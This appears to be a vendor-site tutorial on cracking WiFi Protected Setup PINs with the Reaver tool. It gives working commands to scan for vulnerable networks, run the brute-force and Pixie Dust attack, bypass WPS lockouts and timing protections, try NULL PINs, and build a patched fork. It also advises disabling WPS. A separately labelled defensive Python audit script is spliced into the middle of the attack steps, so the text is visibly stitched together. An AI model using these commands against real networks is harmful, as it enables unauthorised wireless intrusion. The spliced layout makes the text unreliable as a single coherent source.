WiFi Protected Setup (WPS) is a convenience feature that lets a user join a client device to a wireless network by pressing a button on the WiFi router and on the client device at the same time (the client-side “button” is often in software). The devices exchange information and then set up a secure WPA link.
Reaver was designed to brute-force the WPS PIN handshake remotely, even when the physical WPS button has never been pressed on the WiFi router.
While some newer devices are building in protection against this specific attack, the Reaver WPS exploit remains useful on many networks in the field.
In particular, WPS is the vulnerable system here, not WPA. If a network has WPS disabled (which it should be, given the existence of tools such as this), it is immune to the following attack.
To list the WiFi networks in range together with their WPS version and WPS Locked status:
wash -i wlan0mon
The “WPS Locked” column is far from a definitive indicator, but the networks it shows as unlocked are much more susceptible to brute forcing.
To launch Reaver against the WiFi network with BSSID 11:22:33:44:55:66:
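A defender-side use of the same wash survey, as an added example that is not part of the original article: it parses the saved wash table and reports which of your own access points still advertise WPS, so they can be switched off before anyone runs the attack this article describes. The column layout, the sample rows and the list of owned BSSIDs are constructed assumptions and may differ from your wash version.

```python
import re
from dataclasses import dataclass

# Constructed sample of a wash survey (not real networks). Column layout is
# assumed: BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID.
SAMPLE_WASH = """\
BSSID               Channel  RSSI  WPS Version  WPS Locked  ESSID
---------------------------------------------------------------------
11:22:33:44:55:66   11       -47   1.0          No          Office-Main
AA:BB:CC:DD:EE:01   6        -63   2.0          Yes         Office-Guest
AA:BB:CC:DD:EE:02   1        -71   1.0          No          Lab Printer 2
"""

# BSSIDs the organisation owns (constructed); other rows are neighbours' APs.
OWNED = {"11:22:33:44:55:66", "AA:BB:CC:DD:EE:01"}

ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<ch>\d+)\s+"
    r"(?P<rssi>-?\d+)\s+(?P<ver>\d\.\d)\s+(?P<locked>Yes|No)\s+(?P<essid>.*)$"
)

@dataclass
class Finding:
    bssid: str
    essid: str
    channel: int
    locked: bool
    severity: str

def audit(wash_output: str, owned: set) -> list:
    """One finding per owned AP that wash lists, i.e. that still advertises WPS.
    "Locked" only means the AP is currently refusing PIN attempts, which is not
    definitive, so locked APs are reported at lower severity, not dropped."""
    findings = []
    for line in wash_output.splitlines():
        m = ROW.match(line.strip())
        if not m or m["bssid"].upper() not in owned:
            continue  # header, separator line, or not our network
        locked = m["locked"] == "Yes"
        findings.append(Finding(bssid=m["bssid"].upper(),
                                essid=m["essid"].strip(),
                                channel=int(m["ch"]),
                                locked=locked,
                                severity="medium" if locked else "high"))
    # Unlocked (high) findings first, then by BSSID for a stable report.
    return sorted(findings, key=lambda f: (f.locked, f.bssid))

if __name__ == "__main__":
    for f in audit(SAMPLE_WASH, OWNED):
        print(f"{f.severity.upper():6} {f.bssid} ch{f.channel:<2} {f.essid}: disable WPS")
```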
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1
It may take several hours, or even longer, because better designed WiFi routers are getting smarter at rejecting repeated attempts: longer and irregular timeout periods, PINs with an illogical checksum, and the NULL PIN.
Ideally, the above command works and the attack progresses as expected. In reality, manufacturers implement smarter protections against Reaver-style attacks, and additional options may be required to get the attack moving.
To work around these protections, a few optional switches can be added to get Reaver working on more picky devices:
reaver -i wlan0mon -c 11 -b 11:22:33:44:55:66 -vv -L -N -d 10 -T .5 -r 4:20
where
-c 11 uses channel 11
-L ignores the locked WPS state
-N does not send NACK packets when errors are detected
-d 10 delays 10 seconds between PIN attempts
-T .5 sets the timeout period to half a second
-r 4:20 sleeps for 20 seconds after every 4 attempts
Simply run reaver with no arguments to see the full list of options to experiment with:
reaver
Reaver starts with the PIN "12345670", which appears not to change but is in fact only the starting point, followed by subsequent variations sent to the router. Knowing that a successful hit is only a matter of time, clever designers introduced a NULL PIN, which the original Reaver programmer had never anticipated. A patched version, reaver-wps-fork-t6x, emerged in 2017 to combat the NULL PIN.
Installation was pretty straightforward in a newly created Reaver directory:
mkdir reaver
cd reaver
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
apt-get install -y libpcap-dev
cd reaver-wps-fork-t6x/src   # the clone creates its own subdirectory
./configure
make && make install
The -p option then becomes available to supply a NULL PIN or a digit sequence of various lengths.
NULL PIN:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1 -p ""
A PIN of 4 digits:
reaver -i wlan0mon -b 11:22:33:44:55:66 -vv -K 1 -p "4321"
The verdict #1:
Nothing is unbreakable unless one gives up too early. The best defense is to disable WPS on the WiFi router, create a sophisticated password, and change it as often as possible.
Copyright © All rights reserved | TurboTenna is a registered trademark of Datacom Network Ltd.